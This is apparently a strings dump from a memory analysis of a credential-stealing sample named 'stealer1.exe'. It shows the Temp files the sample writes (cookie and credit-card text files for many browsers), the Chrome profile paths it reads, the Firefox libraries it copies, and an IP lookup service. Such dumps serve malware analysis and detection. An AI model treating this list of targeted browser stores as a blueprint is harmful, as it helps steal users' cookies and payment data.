- 0x36040f (10): v2.5.29.19
- 0x36043f (10): v2.5.29.32
- 0x36046f (10): v2.5.29.35
- 0x36049f (10): v2.5.29.14
- 0x3604cf (10): v2.5.29.17
- 0x3604ff (10): v2.5.29.18
- 0x36052f (10): v2.5.29.21
- 0x36055f (10): v2.5.29.31
- 0x36058f (10): v2.5.29.37
- 0x3605bf (10): v2.5.29.20
- 0x3605ef (10): v2.5.29.27
- 0x36061f (10): v2.5.29.28
- 0x36064f (10): v2.5.29.46
- 0x36067f (10): v2.5.29.30
- 0x3606af (10): v2.5.29.33
- 0x3606df (9): v2.5.29.5
- 0x36070f (10): v2.5.29.36
- 0x36073f (10): v2.5.29.54
- 0x36076f (9): v2.5.29.1
- 0x36079f (9): v2.5.29.2
- 0x3607cf (9): v2.5.29.4
- 0x3607ff (9): v2.5.29.7
- 0x360a27 (21): v1.3.6.1.4.1.311.10.1
- 0x360a5f (19): v1.2.840.113549.3.2
- 0x360a97 (22): v1.2.840.113549.1.9.15
- 0x360acf (18): v1.3.6.1.5.5.7.1.3
- 0x360b07 (21): v1.2.840.113549.1.9.5
- 0x360b3f (23): v1.3.6.1.4.1.311.13.2.1
- 0x360b77 (23): v1.3.6.1.4.1.311.13.2.2
- 0x360baf (23): v1.3.6.1.4.1.311.10.9.1
- 0x360be7 (21): v1.3.6.1.4.1.311.21.7
- 0x360c1f (21): v1.3.6.1.5.5.7.48.1.1
- 0x360c57 (19): v1.3.6.1.5.5.7.1.12
- 0x360c8f (18): v1.3.6.1.5.5.7.1.2
- 0x360cc7 (18): v1.2.840.10045.4.3
- 0x360cff (18): v1.2.840.10045.2.1
- 0x360d37 (22): v1.2.840.113549.1.1.10
- 0x360d6f (21): v1.2.840.113549.1.1.7
- 0x360ddf (18): v1.3.6.1.5.5.7.2.2
- 0x360e17 (18): v1.3.6.1.5.5.7.1.1
- 0x360e4f (19): v1.3.6.1.5.5.7.1.11
- 0x360e87 (23): v1.3.6.1.4.1.311.2.1.14
- 0x360ebf (22): v1.2.840.113549.1.9.14
- 0x360ef7 (21): v1.3.6.1.4.1.311.10.2
- 0x360f2f (21): v1.3.6.1.4.1.311.10.1
- 0x360f67 (19): v1.2.840.113549.3.2
- 0x360f9f (22): v1.2.840.113549.1.9.15
- 0x360fd7 (18): v1.3.6.1.5.5.7.1.3
- 0x36100f (21): v1.2.840.113549.1.9.5
- 0x361047 (23): v1.3.6.1.4.1.311.13.2.1
- 0x36107f (23): v1.3.6.1.4.1.311.13.2.2
- 0x3610b7 (23): v1.3.6.1.4.1.311.10.9.1
- 0x3610ef (21): v1.3.6.1.4.1.311.21.7
- 0x361127 (21): v1.3.6.1.5.5.7.48.1.1
- 0x36115f (19): v1.3.6.1.5.5.7.1.12
- 0x361197 (18): v1.3.6.1.5.5.7.1.2
- 0x3611cf (18): v1.2.840.10045.4.3
- 0x36139f (9): v2.5.29.8
- 0x3613cf (10): v2.5.29.10
- 0x3613ff (10): v2.5.29.15
- 0x36142f (10): v2.5.29.19
- 0x36145f (10): v2.5.29.32
- 0x36148f (9): v2.5.29.3
- 0x3614bf (10): v2.5.29.35
- 0x3614ef (10): v2.5.29.14
- 0x36151f (10): v2.5.29.17
- 0x36154f (10): v2.5.29.18
- 0x36157f (10): v2.5.29.21
- 0x3615af (10): v2.5.29.31
- 0x3615df (10): v2.5.29.37
- 0x36160f (10): v2.5.29.20
- 0x36163f (10): v2.5.29.27
- 0x36166f (10): v2.5.29.28
- 0x36169f (10): v2.5.29.46
- 0x3616cf (10): v2.5.29.30
- 0x3616ff (10): v2.5.29.33
- 0x36172f (9): v2.5.29.5
- 0x36175f (10): v2.5.29.36
- 0x36178f (10): v2.5.29.54
- 0x36181f (13): v1.3.14.3.2.7
- 0x36184f (13): v1.3.14.3.2.7
- 0x361b87 (26): v2.16.840.1.113733.1.7.1.1
- 0x361bc7 (25): v1.3.6.1.4.1.311.10.11.85
- 0x361c1f (18): v1.2.840.10045.2.1
- 0x361c57 (22): v1.2.840.113549.1.1.10
- 0x361c8f (21): v1.2.840.113549.1.1.7
- 0x361cff (19): v1.2.840.113549.3.7
- 0x361d37 (19): v1.2.840.113549.3.2
- 0x361d6f (19): v1.2.840.113549.3.4
- 0x361da7 (21): v1.2.840.113549.1.1.1
- 0x361ddf (19): v1.2.840.113549.3.7
- 0x361e17 (19): v1.2.840.113549.3.2
- 0x361e4f (19): v1.2.840.113549.3.4
- 0x361ec8 (10): USERNAME=A
- 0x361f50 (36): C:\Users\A\Desktop
- 0x361ff8 (40): C:\Users\A\Documents
- 0x3620a0 (44): C:\Program Files (x86)
- 0x3621f0 (44): Microsoft Unified Security Protocol Provider
- 0x362228 (44): PKU2U Security Package
- 0x362298 (46): LRPC-710cd034e2444564be
- 0x3622d0 (46): Microsoft Kerberos V1.0
- 0x362308 (42): NTLM Security Package
- 0x362418 (35): CertDllVerifyCertificateChainPolicy
- 0x362470 (34): CryptMsgDllCNGGenContentEncryptKey
- 0x3624c8 (37): CryptMsgDllCNGImportContentEncryptKey
- 0x362a0d (6): r,t8*6
- 0x362a34 (7): r,t`*6
- 0x362afd (6): r,t(+6
- 0x362b25 (6): r,tP+6
- 0x362b4d (6): r,tx+6
- 0x362c14 (7): @s,th,6
- 0x362c38 (31): C:\Users\A\Desktop\stealer1.exe
- 0x362df0 (222): C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\
- 0x362ed8 (246): C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
- 0x363008 (142): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.dll
- 0x363130 (15): Winsta0\Default
- 0x363190 (14): AppData
- 0x3631a8 (14): Desktop
- 0x3631c0 (14): Desktop
- 0x3640ee (26): =C:\Program F
- 0x3641aa (26):
- 0x364228 (24):
- 0x364241 (8):
- 0x36428a (26): abcdefghijklmnopqrstuvwxyz
- 0x3642aa (26): ABCDEFGHIJKLMNOPQRSTUVWXYZ
- 0x364388 (31): C:\Users\A\Desktop\stealer1.exe
- 0x3643d8 (14): COMPUTERNAME=O
- 0x3643f8 (104): C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL
- 0x365ad8 (30): AppData\Roaming
- 0x365b00 (26): Local AppData
- 0x365b28 (26): AppData\Local
- 0x365b50 (24): ProgramFiles
- 0x365b78 (30): ProgramFilesX86
- 0x365de0 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x365e48 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x365eb0 (48): CommonProgramW6432=C:\Program Files\Common Files
- 0x365f10 (19): FP_NO_HOST_CHECK=NO
- 0x365f50 (12): HOMEDRIVE=C:
- 0x365f90 (17): HOMEPATH=\Users\A
- 0x365fd0 (37): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x366028 (15): LOGONSERVER=\\O
- 0x366068 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x3660e0 (36): MpConfig_ProductCodeName=AntiSpyware
- 0x366138 (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x3661a0 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x366208 (13): OS=Windows_NT
- 0x366248 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x366318 (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x366388 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x366400 (17): PROCESSOR_LEVEL=6
- 0x366440 (40): ProgramFiles(x86)=C:\Program Files (x86)
- 0x366498 (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x366508 (19): SESSIONNAME=Console
- 0x366548 (14): SystemDrive=C:
- 0x366588 (12): USERDOMAIN=O
- 0x3665c8 (17): windir=C:\Windows
- 0x366608 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x366ea2 (106): 6\Device\HarddiskVolume2\Users\A\Desktop\stealer1.exe
- 0x3675d0 (82): @%SystemRoot%\system32\shell32.dll,-21769
- 0x367630 (78): %SystemRoot%\system32\imageres.dll,-183
- 0x3676a8 (16): Personal
- 0x3676c8 (18): Documents
- 0x3676e8 (158): ::{59031a47-3f72-44a7-89c5-5595fe6b30ee}\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}
- 0x367790 (82): @%SystemRoot%\system32\shell32.dll,-21770
- 0x3677f0 (78): %SystemRoot%\system32\imageres.dll,-112
- 0x3678e0 (14): COMPUTERNAME=O
- 0x3679a0 (13): OS=Windows_NT
- 0x3679e0 (17): PROCESSOR_LEVEL=6
- 0x367a20 (19): SESSIONNAME=Console
- 0x367b60 (17): HOMEPATH=\Users\A
- 0x367be0 (12): USERDOMAIN=O
- 0x367c20 (12): HOMEDRIVE=C:
- 0x367d00 (50): Schannel Security Package
- 0x367d40 (50): Schannel Security Package
- 0x367e20 (15): LOGONSERVER=\\O
- 0x367ee0 (19): FP_NO_HOST_CHECK=NO
- 0x367f80 (54): TS Service Security Package
- 0x367fe0 (14): SystemDrive=C:
- 0x368660 (17): windir=C:\Windows
- 0x368868 (82): @%SystemRoot%\system32\shell32.dll,-21781
- 0x3688e8 (82): @%SystemRoot%\system32\shell32.dll,-21817
- 0x368dc0 (38): C:\Windows\rescache
- 0x368ee0 (34): protected_storage
- 0x368fd0 (33): Digest Authentication for Windows
- 0x3690a2 (14): 6GSSAPI
- 0x3698b4 (20): sr-Latn-CS
- 0x369906 (16): qps-ploc
- 0x369918 (18): qps-plocm
- 0x36995c (16): 52C64B7E
- 0x36a216 (30): tzres.dll,-212
- 0x36a256 (42): Pacific Standard Time
- 0x36a296 (30): @tzres.dll,-211
- 0x36a2d6 (42): Pacific Daylight Time
- 0x36a3f8 (38): C:\Users\A\AppData\Local\Temp\body.out
- 0x36a7b8 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
- 0x36a9e0 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
- 0x36ac08 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
- 0x36ae30 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
- 0x36b058 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
- 0x36b280 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
- 0x36b4a8 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
- 0x36b6d0 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
- 0x36b8f8 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
- 0x36bb20 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
- 0x36bd48 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
- 0x36bf70 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
- 0x36c198 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
- 0x36c3c0 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
- 0x36c5e8 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
- 0x36c810 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
- 0x36ca38 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
- 0x36cc60 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
- 0x36ce88 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
- 0x36d0b0 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
- 0x36d2d8 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
- 0x36d500 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
- 0x36d728 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
- 0x36d950 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
- 0x36db78 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
- 0x36dda0 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
- 0x36dfc8 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
- 0x36e1f0 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
- 0x36e418 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
- 0x36e9ae (54): 9ppData\Local\Google\Chrome
- 0x36ed20 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x36ed88 (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x36ee38 (192): PATH=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
- 0x36ef28 (192): PATH=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
- 0x36fe06 (78): 8sers\A\AppData\Local\Temp\MSVCP140.dll
- 0x36fe56 (24): MSVCP140.dll
- 0x36fe70 (26): \MSVCP140.dll
- 0x36fef0 (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x3707c0 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
- 0x3709e8 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
- 0x370c10 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
- 0x370e38 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
- 0x371060 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
- 0x371288 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
- 0x3714b0 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
- 0x3716d8 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
- 0x371900 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
- 0x371b28 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
- 0x371d50 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
- 0x371f78 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
- 0x3721a0 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
- 0x3723c8 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
- 0x3725f0 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
- 0x372818 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
- 0x372a40 (42): C:\Users\A\AppData\Local\Temp\Opera_CC.txt
- 0x372c68 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
- 0x372e90 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
- 0x3730b8 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
- 0x3732e0 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
- 0x373508 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
- 0x373730 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
- 0x373958 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
- 0x373b80 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
- 0x373da8 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
- 0x373fd0 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
- 0x3741f8 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
- 0x374420 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
- 0x3747c0 (45): C:\Users\A\AppData\Local\Temp\Maxthon5_CC.txt
- 0x3749e8 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
- 0x374c10 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
- 0x374e38 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
- 0x375060 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
- 0x375288 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
- 0x3754b0 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
- 0x3756d8 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
- 0x375900 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
- 0x375b28 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
- 0x375d50 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
- 0x375f78 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
- 0x3761a0 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
- 0x3763c8 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
- 0x3765f0 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
- 0x376818 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
- 0x376a40 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
- 0x376c68 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
- 0x376e90 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
- 0x3770b8 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
- 0x3772e0 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
- 0x3774f4 (514): C:\Users\A\Desktop;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
- 0x37a868 (48): CommonProgramW6432=C:\Program Files\Common Files
- 0x37a8a8 (82): C:\Users\A\AppData\Local\Temp\mozglue.dll
- 0x37cf14 (30): dows\system32\_
- 0x37d068 (7): WDigest
- 0x37d6a0 (11): cryptsp.dll
- 0x37d730 (12): NegoExtender
- 0x37d760 (9): Negotiate
- 0x37d778 (14): ncalrpc
- 0x37d790 (8): Kerberos
- 0x37d7c0 (8): Schannel
- 0x37d7d8 (14): WDigest
- 0x37d850 (14): CREDSSP
- 0x37da20 (22): DNSResolver
- 0x37da80 (16): epmapper
- 0x37daa0 (17): SystemFunction035
- 0x37dae0 (20): lsasspirpc
- 0x37db00 (20): lsasspirpc
- 0x37db20 (18): Negotiate
- 0x37db40 (16): Kerberos
- 0x37db60 (23): Microsoft Kerberos V1.0
- 0x37db80 (21): NTLM Security Package
- 0x37dba0 (16): Schannel
- 0x37dbc0 (22): PKU2U Security Package
- 0x37dc20 (20): rogin Data
- 0x37e570 (28): Microsoft Package Negotiator
- 0x37e8b8 (24): NegoExtender
- 0x37e8e0 (29): NegoExtender Security Package
- 0x37e908 (25): Schannel Security Package
- 0x37e958 (25): Schannel Security Package
- 0x37e9d0 (27): TS Service Security Package
- 0x37e9fa (18): DVAPI32.d
- 0x37f268 (88): Microsoft Unified Security Protocol Provider
- 0x37f6bc (26): api.ipify.org
- 0x37f7b8 (21): COMODO CA Limited1604
- 0x37f7d3 (47): -COMODO RSA Domain Validation Secure Server CA0
- 0x37f804 (14):
- 180124000000Z
- 0x37f813 (19):
- 210123235959Z0X1!0
- 0x37f82e (25): Domain Control Validated1
- 0x37f851 (21): PositiveSSL Wildcard1
- 0x37f870 (12): *.ipify.org0
- 0x37fa50 (30): https://secure.comodo.com/CPS0
- 0x37fa89 (69): Chttp://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
- 0x37faeb (70): Chttp://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt0$
- 0x37fb3d (26): http://ocsp.comodoca.com0!
- 0x37fb62 (11): *.ipify.org
- 0x37fb6e (12): ipify.org0
- 0x382fe8 (20): %pi.ipify.
- 0x383d0c (23): LRPC-710cd034e2444564be
- 0x385a30 (64): C:\Windows\SysWOW64\negoexts.DLL
- 0x385a80 (64): C:\Windows\SysWOW64\Kerberos.DLL
- 0x385ad0 (64): C:\Windows\SysWOW64\schannel.dll
- 0x385b20 (66): Digest Authentication for Windows
- 0x385b70 (62): C:\Windows\SysWOW64\wdigest.dll
- 0x385bc0 (70): Microsoft CredSSP Security Provider
- 0x385c10 (64): C:\Windows\SysWOW64\schannel.dll
- 0x385c80 (34): TEMP=C:\Users\A\AppData\Local\Temp
- 0x385cd0 (33): TMP=C:\Users\A\AppData\Local\Temp
- 0x387384 (22): cryptsp.dll
- 0x388c60 (32): @@HHPPXX``hhppxx
- 0x388d4e (50): 8 ((0088@@HHPPXX``hhppxx
- 0x388e4e (50): 8 ((0088@@HHPPXX``hhppxx
- 0x388f4e (50): 8 ((0088@@HHPPXX``hhppxx
- 0x38904e (50): 8 ((0088@@HHPPXX``hhppxx
- 0x38914e (50): 8 ((0088@@HHPPXX``hhppxx
- 0x38924e (50): 8 ((0088@@HHPPXX``hhppxx
- 0x38934e (50): 8 ((0088@@HHPPXX``hhppxx
- 0x38942e (20): 8 ((0088K
- 0x38a51e (42): 8bcryptprimitives.dll
- 0x38a552 (7): dationY
- 0x38a7f1 (48): Chttp://crl.comodoca.com/COMODORSADomainValidatA
- 0x38a828 (80): C:\Windows\SysWOW64\bcryptprimitives.dll
- 0x38a87a (7): nValid;
- 0x38a8cc (9): ipify.org
- 0x38a8d6 (12): ipify.org0
- 0x38aa40 (19): Greater Manchester1
- 0x38aa5d (8): Salford1
- 0x38aa8c (34): OMODO RSA Certification Authority0
- 0x38aab0 (14):
- 140212000000Z
- 0x38aabf (15):
- 290211235959Z0
- 0x38ab05 (8): Salford1
- 0x38ab17 (21): COMODO CA Limited1604
- 0x38ab32 (26): -COMODO RSA Domain Validat
- 0x38ace8 (40): bcryptprimitives.dll
- 0x38ade0 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
- 0x38aff8 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x38b178 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
- 0x38b4d4 (20): ncrypt.dll
- 0x38b9b0 (10): USERNAME=A
- 0x38c8a8 (14): =::=::\
- 0x38c8b8 (60): ALLUSERSPROFILE=C:\ProgramData
- 0x38c8f6 (68): APPDATA=C:\Users\A\AppData\Roaming
- 0x38c93c (108): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x38c9aa (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x38ca22 (96): CommonProgramW6432=C:\Program Files\Common Files
- 0x38ca84 (28): COMPUTERNAME=O
- 0x38caa2 (70): ComSpec=C:\Windows\system32\cmd.exe
- 0x38caea (38): FP_NO_HOST_CHECK=NO
- 0x38cb12 (24): HOMEDRIVE=C:
- 0x38cb2c (34): HOMEPATH=\Users\A
- 0x38cb50 (74): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x38cb9c (30): LOGONSERVER=\\O
- 0x38cbbc (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x38cc48 (72): MpConfig_ProductCodeName=AntiSpyware
- 0x38cc92 (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x38cd00 (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x38cda8 (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x38ce20 (44): NUMBER_OF_PROCESSORS=4
- 0x38ce4e (26): OS=Windows_NT
- 0x38ce6a (384): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
- 0x38cfec (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x38d068 (52): PROCESSOR_ARCHITECTURE=x86
- 0x38d09e (56): PROCESSOR_ARCHITEW6432=AMD64
- 0x38d0d8 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x38d16a (34): PROCESSOR_LEVEL=6
- 0x38d18e (46): PROCESSOR_REVISION=9e09
- 0x38d1be (52): ProgramData=C:\ProgramData
- 0x38d1f4 (70): ProgramFiles=C:\Program Files (x86)
- 0x38d23c (80): ProgramFiles(x86)=C:\Program Files (x86)
- 0x38d28e (58): ProgramW6432=C:\Program Files
- 0x38d2ca (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x38d34c (44): PUBLIC=C:\Users\Public
- 0x38d37a (38): SESSIONNAME=Console
- 0x38d3a2 (28): SystemDrive=C:
- 0x38d3c0 (42): SystemRoot=C:\Windows
- 0x38d3ec (68): TEMP=C:\Users\A\AppData\Local\Temp
- 0x38d432 (66): TMP=C:\Users\A\AppData\Local\Temp
- 0x38d476 (24): USERDOMAIN=O
- 0x38d490 (20): USERNAME=A
- 0x38d4a6 (44): USERPROFILE=C:\Users\A
- 0x38d4d4 (34): windir=C:\Windows
- 0x38d4f8 (46): windows_tracing_flags=3
- 0x38d528 (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x38d5c8 (84): C:\Users\A\AppData\Local\Temp\MSVCP140.dll
- 0x38d61e (24): MSVCP140.dll
- 0x38d638 (26): \MSVCP140.dll
- 0x38d978 (62): Microsoft SSL Protocol Provider
- 0x38de0e (6): H+HU 9
- 0x38df26 (19): Greater Manchester1
- 0x38df43 (8): Salford1
- 0x38df55 (21): COMODO CA Limited1604
- 0x38df70 (47): -COMODO RSA Domain Validation Secure Server CA0
- 0x38dfa1 (14):
- 180124000000Z
- 0x38dfb0 (19):
- 210123235959Z0X1!0
- 0x38dfcb (25): Domain Control Validated1
- 0x38dfee (21): PositiveSSL Wildcard1
- 0x38e00d (12): *.ipify.org0
- 0x38e1ed (30): https://secure.comodo.com/CPS0
- 0x38e226 (69): Chttp://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
- 0x38e288 (70): Chttp://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt0$
- 0x38e2da (26): http://ocsp.comodoca.com0!
- 0x38e2ff (11): *.ipify.org
- 0x38e30b (12): ipify.org0
- 0x38e476 (19): Greater Manchester1
- 0x38e493 (8): Salford1
- 0x38e4a5 (21): COMODO CA Limited1+0)
- 0x38e4c0 (36): "COMODO RSA Certification Authority0
- 0x38e4e6 (14):
- 140212000000Z
- 0x38e4f5 (15):
- 290211235959Z0
- 0x38e51e (19): Greater Manchester1
- 0x38e53b (8): Salford1
- 0x38e54d (21): COMODO CA Limited1604
- 0x38e568 (47): -COMODO RSA Domain Validation Secure Server CA0
- 0x38e776 (62): ;http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
- 0x38e7cf (50): /http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$
- 0x38e80d (26): http://ocsp.comodoca.com0
- 0x38e8ca (6): f5s2`N
- 0x390b4c (32): tem32\bcrypt.dll
- 0x390ff0 (40): bcryptprimitives.dll
- 0x391028 (62): Microsoft SSL Protocol Provider
- 0x391120 (26): PROCESSOR_ARCHITECTURE=x86
- 0x391168 (21): SystemRoot=C:\Windows
- 0x391288 (23): PROCESSOR_REVISION=9e09
- 0x3912f8 (62): C:\Windows\system32\dbghelp.dll
- 0x391558 (22): PUBLIC=C:\Users\Public
- 0x3915a0 (26): ProgramData=C:\ProgramData
- 0x3915e8 (23): windows_tracing_flags=3
- 0x391630 (22): USERPROFILE=C:\Users\A
- 0x391870 (22): NUMBER_OF_PROCESSORS=4
- 0x394083 (6): +][!>G
- 0x3942ba (7): L#K~Dl
- 0x3970a8 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
- 0x3972c0 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
- 0x3974d8 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
- 0x3976d6 (368): 6rogram Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
- 0x3978b0 (112): C:\Users\A\AppData\Local\Google\Chrome\USERDA~1\Default\
- 0x3ce298 (37): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x3ce2f0 (36): MpConfig_ProductCodeName=AntiSpyware
- 0x3ce348 (40): ProgramFiles(x86)=C:\Program Files (x86)
- 0x3ce3a0 (38): C:\Users\A\AppData\Local\Temp\nss3.dll
- 0x3ce3d8 (76): C:\Users\A\AppData\Local\Temp\nss3.dll
- 0x3ce430 (76): C:\Users\A\AppData\Local\Temp\nss3.dll
- 0x3cfa80 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
- 0x3cfd18 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x3cfd90 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x3cfe08 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
